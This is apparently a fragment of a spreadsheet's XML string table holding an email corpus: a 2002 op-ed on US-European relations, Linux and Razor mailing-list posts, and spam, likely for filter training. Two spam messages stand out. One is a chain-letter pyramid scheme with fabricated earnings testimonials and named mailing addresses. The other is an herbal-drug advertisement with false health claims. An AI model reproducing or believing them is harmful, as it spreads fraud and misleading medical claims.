 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Disappearing Alliance
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.techcentralstation.com/1051/printer.jsp?CID=1051-100802B
 The Disappearing Alliance
 By Dale Franks 10/08/2002
 For over two generations, the countries of Western Europe have been our
 closest allies. We stood beside each other through the darkest days of the
 Cold War as partners in the North Atlantic Treaty Organization. We
 celebrated with them over the fall of the Soviet Empire and the liberation
 of Eastern Europe from the yoke of communism.
 Tragically, a generation from now, we may be bitter adversaries.
 Europe has increasingly fallen under the spell of a political ideology that
 Hudson Institute scholar John Fonte has termed "progressive
 transnationalism". The key doctrines of this form of post-communist
 progressivism contain some fairly pernicious ideas. Among these are the
 deconstruction of nationalism, the promotion of post-nationalist ideas of
 citizenship (i.e. a "global" citizenry), a redefinition of democracy, and
 the pooling of national sovereignty into multinational groups such as the
 United Nations.
 The European Union, itself a multinational organization built through the
 pooling of sovereignty by European nations, is post-democratic. While there
 is a European Parliament, the EU's power resides mainly in the unelected
 European Commission (EC) and its unelected President, who face few limits
 to their power. Instead of a limited, consensual form of government, where
 elected representatives promulgate constitutional laws, the EU has an
 appointed, oligarchic executive, along with a large attendant bureaucracy,
 whose orders are not constitutionally limited in any real sense. Moreover,
 the EU has been unwilling to accept the democratically expressed wishes of
 the people themselves when those wishes conflict with the results desired
 by the EU's political elite. Both the EC and the European Court of Justice
 regularly overturn the national laws of democratically elected EU member
 governments. This is a step backward in Europe's political development.
 European criticism of America is on the rise, and the European list of
 complaints about America is a long and growing one. They dislike the fact
 that our republican system of government is not based on proportional
 representation. They hate the fact that our citizens own guns. They despise
 the fact that we execute murderers. They resent the fact that our economy
 is so large, and that Americans consume so much. They also resent?and fear
 - the fact that we have the ability to project American power anywhere
 in the world.
 On August 9, 2002, Adrian Hamilton wrote a column in the UK's Independent
 newspaper, in which he identified the US as a rogue state who should be
 restrained, perhaps by a European military invasion, followed by a decade
 or so of occupation. Fortunately, the article is satirical not because it
 exaggerates the way European progressives view the US, but rather because
 the impotence of European military power makes the idea of an invasion of
 the US literally fantastic.
 At least, for now.
 Despite the tongue-in-cheek nature of this editorial, however, the fact
 remains that America is increasingly viewed this way by the European
 intellectual and political elite.
 The Europeans actively desire a world where the United Nations keeps in
 check the activities of sovereign states. Because they have built such a
 system in Europe, they feel it's valid for the rest of the world. America,
 however, is the biggest obstacle to such a system. The Europeans cannot
 understand why America places a higher value on the ethos of national
 sovereignty and limited, consensual, and constitutional government, than it
 does on compliance with international "norms." They view all departures
 from such norms as aberrant. Because the UN member states all have an equal
 vote in prescribing international norms, they assume that, since the
 process is ostensibly legitimate, the results must be as well. The trouble
 with this idea, of course, is that it gives the views of non-democratic,
 authoritarian states the same weight as those of free, democratic
 societies. It sanctifies the process, with no regard to the actual results.
 Thus, they are unable to make any moral distinction between the US refusals
 to join in a given international effort because we wish to preserve the
 liberty of our citizens, and similar refusals from Iraq because its
 dictator wishes to maintain his firm grip on power. Our repeated references
 to the US Constitution, and our unwillingness to bypass its provisions to
 comply with international norms, are incomprehensible to them. They assume,
 therefore, that our refusal is based on arrogance, rather than on a
 commitment to
 constitutional rights.
 None of this bodes well for the future of Euro-American friendship, or
 cooperation. If the Europeans continue to reject traditional liberalism in
 favor of the new progressivism, their criticism of the US will rise, while
 their tolerance of our differences will fall. Obviously, in such a
 political atmosphere, the opportunities for conflict will inevitably
 increase.
 That thought is frightening enough. Even more frightening, however, is the
 thought that such a conflict might be averted by our own acceptance of the
 new ideology of transnational progressivism.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</si>
  <si>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Bob Proulx &lt;bob@proulx.com&gt; wrote:
 To: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Friday, August 02, 2002 9:59 PM
 Subject: Re: [Razor-users] False Positives on EFF Messages
 &gt; If spammers spoof a From: Bugtraq address then their
 &gt; spam is automatically revoked by you.
 Good point, but notice that cmeclax said in his example procmail recipe:
    :0
    * !^(some Bugtraq-specific header)
 It should be possible to pick a header that a spammer is not likely forge. He was
 even careful not to reveal in public just what header(s) he is checking.
  -- sidney
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Aug 04, 2002 at 04:36:11AM -0600, SoloCDM wrote:
 &gt; I tried several ways to force the command ln to create a link with
 &gt; an option attached . . . it wouldn't work.
 &gt; 
 &gt; How are there four (/bin/dnsdomainname /bin/domainname
 &gt; /bin/nisdomainname /bin/ypdomainname) different types of hostname
 &gt; links with their own separate options?
 &gt; 
 There's a switch statement in the program on argv[0].
 It's not including any options in the link.
 L.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Alan Cox doesn't like 2.5 so far!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, wintermute wrote:
 &gt; Hmm... begs the question, why remove Handrick?
 andre seems to have a peculiar way of interacting with people on 
 linux-kernel. martin otoh gets on fine with people, but doesnt /seem/ 
 to have his head fully around the ide code yet. 
 &gt; If it ain't broke, don't fix it.
 however, how do you add features? eg tagged commands, udma100, 133, 
 etc.. serial ATA, new chipsets. plus the IDE code might be fine, but 
 lots of drives and chips have bugs, which need working around.
 all that said, Linus says he does his development on an IDE machine
 and hasnt had any problems.
 1. judging from comments on l-k.
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 	warning: do not ever send email to spam@dishone.st
 Fortune:
 The surest way to remain a winner is to win once, and then not play any more.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earn 100.000$ in one year working at home
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello
 You may have seen this business before and
 ignored it. I know I did - many times! However,
 please take a few moments to read this letter.
 I was amazed when the profit potential of this
 business finally sunk in... and it works!
 With easy-to-use e-mail tools and opt-in e-mail,
 success in this business is now fast, easy and
 well within the capabilities of ordinary people
 who know little about internet marketing. And the
 earnings potential is truly staggering!
 I'll make you a promise. READ THIS E-MAIL TO THE END! -
 follow what it says to the letter - and you will not
 worry whether a RECESSION is coming or not, who is
 President, or whether you keep your current job or not.
 Yes, I know what you are thinking. I never responded
 to one of these before either. One day though,
 something just said: "You throw away $25.00 going to
 a movie for 2 hours with your wife. What the heck."
 Believe me, no matter where you believe those "feelings"
 come from, I thank every day that I had that feeling. 
 I cannot imagine where I would be or what I would be
 doing had I not. Read on. It's true. Every word of it.
 It is legal. I checked. Simply because you are buying
 and selling something of value.
 AS SEEN ON NATIONAL TV:
 Making over half a million dollars every 4 to 5
 months from your home.
 THANKS TO THE COMPUTER AGE AND THE INTERNET!
 ==================================================
 BE AN INTERNET MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!!
 Before you say "Bull", please read the following.
 This is the letter you have been hearing about on the
 news lately. Due to the popularity of this letter on
 the internet, a national weekly news program recently
 devoted an entire show to the investigation of this
 program described below, to see if it really can make
 people money. The show also investigated whether or
 not the program was legal.
 Their findings proved once and for all that there are
 "absolutely NO laws prohibiting the participation in
 the program and if people can 'follow the simple
 instructions' they are bound to make some mega bucks
 with only $25 out of pocket cost".
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT
 THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING
 BETTER THAN EVER.
 This is what one had to say: "Thanks to this
 profitable opportunity. I was approached many times
 before but each time I passed on it. I am so glad
 I finally joined just to see what one could expect
 in return for the minimal effort and money required.
 To my astonishment, I received a total $610,470.00
 in 21 weeks, with money still coming in."
 Pam Hedland, Fort Lee, New Jersey.
 ==================================================
 Another said: "This program has been around for a
 long time but I never believed in it. But one day
 when I received this again in the mail I decided
 to gamble my $25 on it. I followed the simple
 instructions and walaa ..... 3 weeks later the
 money started to come in. First month I only made
 $240.00 but the next 2 months after that I made
 a total of $290,000.00. So far, in the past 8 months
 by re-entering the program, I have made over
 $710,000.00 and I am playing it again. The key to
 success in this program is to follow the simple
 steps and NOT change anything."
 More testimonials later but first, =======
 ==== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ====
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 If you would like to make at least $500,000 every
 4 to 5 months easily and comfortably, please read the
 following...THEN READ IT AGAIN and AGAIN!!!
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
 YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!
 INSTRUCTIONS:
 =====Order all 5 reports shown on the list below =====
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
 REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
 person whose name appears ON THAT LIST next to the report.
 MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
 LEFT CORNER in case of any mail problems.
 ===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
 ===YOU ORDER EACH OF THE 5 REPORTS! ===
 You will need all 5 reports so that you can save
 them on your computer and resell them.
 YOUR TOTAL COST $5 X 5 = $25.00.
 Within a few days you will receive, via e-mail, each
 of the 5 reports from these 5 different individuals.
 Save them on your computer so they will be accessible
 for you to send to the 1,000's of people who will
 order them from you. Also make a floppy of these
 reports and keep it on your desk in case something
 happens to your computer.
 IMPORTANT - DO NOT alter the names of the people who
 are listed next to each report, or their sequence on
 the list, in any way other than what is instructed
 below in steps 1 through 6 or you will lose out
 on the majority of your profits. Once you
 understand the way this works, you will also
 see how it will not work if you change it. 
 Remember, this method has been tested, and if you
 alter it, it will NOT work!!! People have tried
 to put their friends'/relatives' names on all five
 thinking they could get all the money. But it does
 not work this way. Believe us, some have tried to
 be greedy and then nothing happened. So Do Not
 try to change anything other than what is instructed.
 Because if you do, it will not work for you.
 Remember, honesty reaps the reward!!! 
 This IS a legitimate BUSINESS. You are offering a
 product for sale and getting paid for it. Treat it
 as such and you will be VERY profitable in a short
 period of time.
 1.. After you have ordered all 5 reports, take this
 advertisement and REMOVE the name &amp; address of the
 person in REPORT # 5. This person has made it through
 the cycle and is no doubt counting their fortune.
 2.. Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address
 ACCURATELY! This is critical to YOUR success.
 ==================================================
 **** Take this entire letter, with the modified
 list of names, and save it on your computer.
 DO NOT MAKE ANY OTHER CHANGES.
 Save this on a disk as well just in case you lose
 any data. To assist you with marketing your business
 on the internet, the 5 reports you purchase will
 provide you with invaluable marketing information
 which includes how to send bulk e-mails legally,
 where to find thousands of free classified ads and
 much more. There are 2 primary methods to get this
 venture going:
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
 ==================================================
 Let's say that you decide to start small, just to see
 how it goes, and we will assume you and those involved
 send out only 5,000 e-mails each. Let's also assume
 that the mailing receives only a 0.2% (2/10 of 1%)
 response (the response could be much better but let's
 just say it is only 0.2%). Also many people will send
 out hundreds of thousands of e-mails instead of only
 5,000 each.
 Continuing with this example, you send out only
 5,000 e-mails. With a 0.2% response, that is only
 10 orders for report # 1. Those 10 people responded
 by sending out 5,000 e-mails each for a total of
 50,000. Out of those 50,000 e-mails only 0.2%
 responded with orders. That's 100 people who
 responded and ordered Report # 2.
 Those 100 people mail out 5,000 e-mails each for
 a total of 500,000 e-mails. The 0.2% response to
 that is 1000 orders for Report # 3.
 Those 1000 people send 5,000 e-mails each for a
 total of 5 million e-mails sent out. The 0.2%
 response is 10,000 orders for Report # 4.
 Those 10,000 people send out 5,000 e-mails each
 for a total of 50,000,000 (50 million) e-mails.
 The 0.2% response to that is 100,000 orders for
 Report # 5.
 THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00
 (half a million dollars).
 Your total income in this example is: 1..... $50
 + 2..... $500 + 3.....$5,000 + 4..... $50,000
 + 5.... $500,000 .... Grand Total=$555,550.00
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND
 FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
 MATTER HOW YOU CALCULATE IT, YOU WILL STILL
 MAKE A LOT OF MONEY!
 ==================================================
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
 ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think
 for a moment what would happen if everyone or half
 or even one 4th of those people mailed 100,000
 e-mails each or more?
 There are over 150 million people on the internet
 worldwide and counting, with thousands more coming
 online every day. Believe me, many people will do
 just that, and more!
 METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
 ==================================================
 Advertising on the net is very, very inexpensive and
 there are hundreds of FREE places to advertise.
 Placing a lot of free ads on the internet will
 easily get a larger response. We strongly suggest
 you start with Method # 1 and add METHOD # 2 as you
 go along. For every $5 you receive, all you must
 do is e-mail them the report they ordered. That's it.
 Always provide same day service on all orders.
 This will guarantee that the e-mail they send out,
 with your name and address on it, will be prompt
 because they cannot advertise until they receive
 the report.
 ===========AVAILABLE REPORTS ====================
 The reason for the "cash" is not because this is
 illegal or somehow "wrong". It is simply about time.
 Time for checks or credit cards to be cleared or
 approved, etc. Concealing it is simply so no one
 can SEE there is money in the envelope and steal
 it before it gets to you.
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY.
 Notes: Always send $5 cash (U.S. CURRENCY) for
 each report. Checks NOT accepted. Make sure the
 cash is concealed by wrapping it in at least
 2 sheets of paper. On one of those sheets of
 paper, write the NUMBER &amp; the NAME of the report
 you are ordering, YOUR E-MAIL ADDRESS and your
 name and postal address.
 PLACE YOUR ORDER FOR THESE REPORTS NOW :
 ==================================================
 REPORT # 1: "The Insider's Guide To Advertising
 for Free On The Net"
 Order Report #1 from:
 Robert Borowczyk
 ul. J. Olbrachta 118C m. 28
 01-373 Warsaw
 Poland
 ______________________________________________________
 REPORT # 2: "The Insider's Guide To Sending Bulk
 Email On The Net"
 Order Report # 2 from: 
 Mohammad Faraziyan
 Engelbertstr. 25 
 40233 Dsseldorf
 Germany
 ______________________________________________________
 REPORT # 3: "Secret To Multilevel Marketing On The Net"
 Order Report # 3 from:
 Luis Pastor
 Apartado 81
 48080
 Bilbao
 Spain
 ______________________________________________________
 REPORT # 4: "How To Become A Millionaire Using
 MLM &amp; The Net"
 Order Report # 4 from: 
 Ali Reza
 Auf den Holln 68
 44894 Bochum
 Germany
 ______________________________________________________
 REPORT # 5: "How To Send Out One Million Emails
 For Free"
 Order Report # 5 From:
 J.siden
 krondikesvgen 54 A
 83147 stersund
 Sweden
 ______________________________________________________
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 === If you do not receive at least 10 orders for
 Report #1 within 2 weeks, continue sending e-mails
 until you do.
 === After you have received 10 orders, 2 to 3 weeks
 after that you should receive 100 orders or more for
 REPORT # 2. If you do not, continue advertising or
 sending e-mails until you do.
 ** Once you have received 100 or more orders for
 Report # 2, YOU CAN RELAX, because the system is
 already working for you, and the cash will continue
 to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time
 your name is moved down on the list, you are placed
 in front of a different report.
 You can KEEP TRACK of your PROGRESS by watching which
 report people are ordering from you. IF YOU WANT TO
 GENERATE MORE INCOME SEND ANOTHER BATCH OF E-MAILS
 AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT
 to the income you can generate from this business !!!
 =================================================
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM: 
 You have just received information that can give you
 financial freedom for the rest of your life, with
 NO RISK and JUST A LITTLE BIT OF EFFORT. You can
 make more money in the next few weeks and months
 than you have ever imagined. Follow the program
 EXACTLY AS INSTRUCTED. Do Not change it in any way.
 It works exceedingly well as it is now.
 Remember to e-mail a copy of this exciting report
 after you have put your name and address in
 Report #1 and moved others to #2 .....# 5 as
 instructed above. One of the people you send this
 to may send out 100,000 or more e-mails and your
 name will be on every one of them. 
 Remember though, the more you send out the more
 potential customers you will reach. So my friend,
 I have given you the ideas, information, materials
 and opportunity to become financially independent.
 IT IS UP TO YOU NOW !
 =============MORE TESTIMONIALS===============
 "My name is Mitchell. My wife, Jody and I live in
 Chicago. I am an accountant with a major U.S.
 Corporation and I make pretty good money. When I
 received this program I grumbled to Jody about
 receiving 'junk mail'. I made fun of the whole
 thing, spouting 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received total $ 147,200.00 ......... all cash!
 I was shocked. I have joined Jody in her 'hobby'."
 Mitchell Wolf M.D., Chicago, Illinois
 ================================================
 "Not being the gambling type, it took me several
 weeks to make up my mind to participate in this plan.
 But conservative as I am, I decided that the initial
 investment was so little that there was just no way
 that I wouldn't get enough orders to at least get
 my money back. I was surprised when I found my
 medium size post office box crammed with orders.
 I made $319,210.00 in the first 12 weeks. 
 The nice thing about this deal is that it does not
 matter where people live. There simply isn't a
 better investment with a faster return and so big."
 Dan Sondstrom, Alberta, Canada
 =================================================
 "I had received this program before. I deleted it,
 but later I wondered if I should have given it a try.
 Of course, I had no idea who to contact to get
 another copy, so I had to wait until I was e-mailed
 again by someone else......... 11 months passed then
 it luckily came again...... I did not delete this one!
 I made more than $490,000 on my first try and all the
 money came within 22 weeks."
 Susan De Suza, New York, N.Y.
 =================================================
 "It really is a great opportunity to make relatively
 easy money with little cost to you. I followed the
 simple instructions carefully and within 10 days the
 money started to come in. My first month I made $20,
 in the 2nd month I made $560.00 and by the end of the
 third month my total cash count was $362,840.00.
 Life is beautiful, Thanx to internet."
 Fred Dellaca, Westport, New Zealand
 =================================================
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
 ROAD TO FINANCIAL FREEDOM !
 =================================================
 If you have any questions of the legality of this
 program, contact the Office of Associate Director
 for Marketing Practices, Federal Trade Commission,
 Bureau of Consumer Protection, Washington, D.C.
 This message is sent in compliance of the proposed
 bill SECTION 301, paragraph (a)(2)(C) of S. 1618. 
 * This message is not intended for residents in the
 State of Washington, Virginia or California,
 screening of addresses has been done to the best
 of our technical ability.
 *  This is a one time mailing and this list will
 never be used again.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call us now, our stash is the best
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff 1 &amp; 2 Personal-Choice, pipe-smoking products/substances to the common market!!!  
 *********************************************************************************
 Now Open Seven Days A Week!
 To express our appreciation to all of our loyal customers, we are offering the following products "2 for 1"  for a limited time only.  Ragga Dagga, Stoney Mahoney, Sweet Vjestika, Aqueous Kathmandu, along with a free 1oz. package of Capillaris Herba.
 Now Open Seven Days A Week!  
 Call 1-623-974-2295 and Get the 2 for 1 Deal ! 
 10:30 AM to 7:00 PM (Mountain Time)
 *********************************************************************************
 We are finally able to offer for your Sensitive/Responsive, Personal Choice Smoking Enjoyment.the Seventh Heaven Temple 3 Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Product. Introduced after three years of research and development; Temple 3 is Personal Choice legal Smoking/Indulgence.Redefined!!!  
 Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offer.in more cultivated/enhanced/viripotent/substantiated format.what had actually already been the most significant, lawful, Personal Choice smoking substance available on the planet.  Seventh Heaven Temple 3 Ragga Dagga (TM) is the sweet, sweet evolution of all of that. 
 * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE 1 &amp; 2).
 * HAPPIER, HAPPY SMOKING!!!
 * INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.
 * MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.
 * NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!
 * INHIBITS STRESS AND ANXIETY.
 * INSPIRES CONTEMPLATIVENESS &amp; CREATIVITY.
 * ENHANCES THE SEXUAL EXPERIENCE!!!
 * GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMING.
 * A SIGNIFICANT HERBA / BOTANICAL SUPPLEMENT IN THE BATTLES AGAINST DRUG AND ALCOHOL DEPENDENCE!!!!
 * EASILY IGNITED &amp; STOKED.
 * SMOKES SWEETLY! 
 * ABSOLUTELY LEGAL / NON-INVASIVE / NO DOWNSIDE!!!
 * LINGERS FOR A GOOD, GOODLY WHILE!
 * POSSESSES MANY FINE GANJA VIRTUES WITH NONE OF THE NEGATIVES!!!
 * JUST A LITTLE SNIPPET / PINCH GOES A LONG, LONG WAY.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).
 Temple 3 Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-Sensitive/Responsive, pipe-smoking/stoking substance and is undoubtedly the most prestigious, legal offering of its sort on the planet!!!  
 So smokin/stokin potent is this cutting edge formulation, that we have even been able to establish a very happy clientele market base within the hard-core stoner arena and have made positive, happy, smoking differences in many, many lives.
 ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!!
 A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon sensitive/responsive herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple 3 Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the happiness coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  
 Ingredients:
 Temple smoking substances and Temple 3 Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES House Smoking Substance Specialties.  Temple 3 Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple 3 Ragga Dagga (TM) is a proprietary, prescribed botanical amalgamation which includes the following synergistically/synesthesia conglomerated, core-refined, ratio-enhanced herbas/botanicals, resins, essences, flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1, to 100 to 1 viripotent concentrations Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Hybrid Flowering Turnera Diffusa, Capillaris Herba, Angelica Root, Wild Dagga mature leaf matter, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian stems, Calea Zacalechichi buddings, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshura cuttings. 
 Please Note:  Temple 3 Ragga Dagga (TM) is an absolutely legal, herba/botanical, Personal Choice, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple 3 Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple 3 Ragga Dagga (TM).  And although we are not age-governed by law.Temple 3 Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple 3 Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their time.  As well, Temple 3 Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicians care in any regard.
 ========================================================
 Here is what our customers are saying about the Temple 3 Ragga Dagga (TM) phenomenon:
 Thank you so much for the Ragga.  It is everything you guys claim, and then some!  I was a bit skeptical when I read your description of its effects, but there is literally no exaggeration in your advertisements.  How nice that this is non-prohibited!  It tastes great and feels great too!  I am so glad I took a chance and ordered.  Blessings to all of you.
 -- Frankie R.
 Location: West Coast, USA
 Im a man of my 40s and I really know my stuff.  I dont drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple 3.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!  
 -- A.J.
 Location: United Kingdom
 ========================================================
 Finally, we realize of course that this Temple 3 Ragga Dagga (TM) is not inexpensive. (Temple 3 Ragga Dagga (TM) is a very, very Sweet Smoke and sweetness is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craft.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple 3 Ragga Dagga (TM). Four or five draws of your pipe.as is the magical way.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple 3 Ragga Dagga (TM) Package.)
 Seventh Heaven Temple 3 Ragga Dagga (TM) is offered exclusively in 56 gram (2 oz.) and 22 gram (.75 oz.) jiggets/bars for $115.00 and $65.00 respectively.  Sorry, no volume discounts.  Wholesale pricing is available to qualified, select merchants only.
 ************************************************************
 Our other fine herbal, botanical products include the following:
 1.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
 2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 
 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...
 4.  Extreme Martial Arts Botanical Remedies; Equivalence Tablets &amp; Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers...
 *********************************************
 Sweet Vjestika Aphrodisia Drops (tm) inspires and enhances:
 * Extreme body sensitivity
 * Sensitivity to touch
 * Desire to touch and be touched
 * Fantasy, lust, rapture, erogenous sensitivity ... 
 * Prolongs and intensifies foreplay, orgasm &amp; climax
 *********************************************
 "Seventh Heaven" Prosaka Tablets ... 
 Entirely natural, proprietary, botanical prescription comprised of uncommon Asian Herbs for Calm, Balance, Serenity and Joyful Living. "Seventh Heaven" Prosaka is indeed a most extraordinary, viripotent, calming, centering, mood-enhancing, holistically-formulated, exotic herbaceous alternative to pharmaceutical medications for depression, anxiety, stress, insomnia, etc.
 NO side effects!  NO dependency!  Vivaciously Mellow!
 **********************************************
 "Seventh Heaven" Gentle Ferocity Tablets (tm) ... 
 a non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; viripotent, herbaceous prescription for the dynamic energization of body, mind and spirit.  
 This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to prolificate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition.  These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective.  Enjoy!
 For those of you who seek to achieve most demonstrative/non-invasive/non-prohibitive appetite suppression without the negative implications of ongoing usage of MaHuang Herb, Ephedra/Ephedrine or Caffeine as are so magnaminously utilized in a multitude of herbal "diet aids" entitled as "Thermogenics" ... this is ABSOLUTELY the herbal agenda/product for you!!
 Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite!
 ***********************************************
 Extreme Martial Arts Botanical Remedies
 Eastern culture has long had a treatment for bone, muscle, tendon, ligament, sinew and joint distress, traumas, afflictions and constrictions.  We are pleased to offer 
   Equivalence Tablets  &amp;  Dragon Wing Remedy Spray
     (Hei Ping Shun)           (Hei Long Chibang)
 PLEASE NOTE:
 While it is true that all physiological traumas and injuries are unique and that no product can arbitrarily eliminate all of the pain and discomfort in all people all of the time, the combination of Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy (Hei Long Chibang) remedial botanicals does guarantee to at the least:
 1.  Significantly reduce discomfort and pain!
 (In many instances most, if not all, traumas and distress can be eliminated!)
 2.  Significantly increase mobility and strength ratio.
 (Please remember also the significance of proper diet, excercise, rest and prayer.)
 Equivalence Tablets &amp; Dragon Wing Spray Remedials are comprised of entirely natural botanical factors.
 While Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy Spray (Hei Long Chibang) are extremely effective individually, they are utilized to maximum advantage when used in conjunction with one another.
 ========================================================
 !!!!Please refer to Introductory Offers further on in this text featuring Temple 3 Ragga Dagga (TM) along with our other very fine Sensitive/Responsive cordial botanical products. Please enjoy!!!  Many Blessings to you all.
 ========================================================
 PRICING INFORMATION:
 1.    SEVENTH HEAVEN Seventh Heaven Temple 3 (tm)
 One     .75 oz. jigget/bar          $65.00
 One    2.0 oz. jigget/bar          $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text)
 2.    SWEET VJESTIKA APHRODISIA DROPS (tm)
 One	1.0 oz. bottle		$90.00   
 Two	1.0 oz. bottles	       $140.00  
 3.    SEVENTH HEAVEN PROSAKA (tm)
 One    100 tablet tin          $40.00
 Three  100 tablet tins        $105.00
 Six    100 tablet tins        $185.00
 4.    SEVENTH HEAVEN GENTLE FEROCITY (tm)
 One   300 tablet jar          $130.00
 5.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
 **  3-pack  (270 tablets)    $83.00
 **  6-pack  (540 tablets)    $126.00 (save $40.00)
 **  9-pack  (810 tablets)    $159.00 (save $90.00)
 **  12-pack (1,080 tablets)  $192.00 (save $140.00)
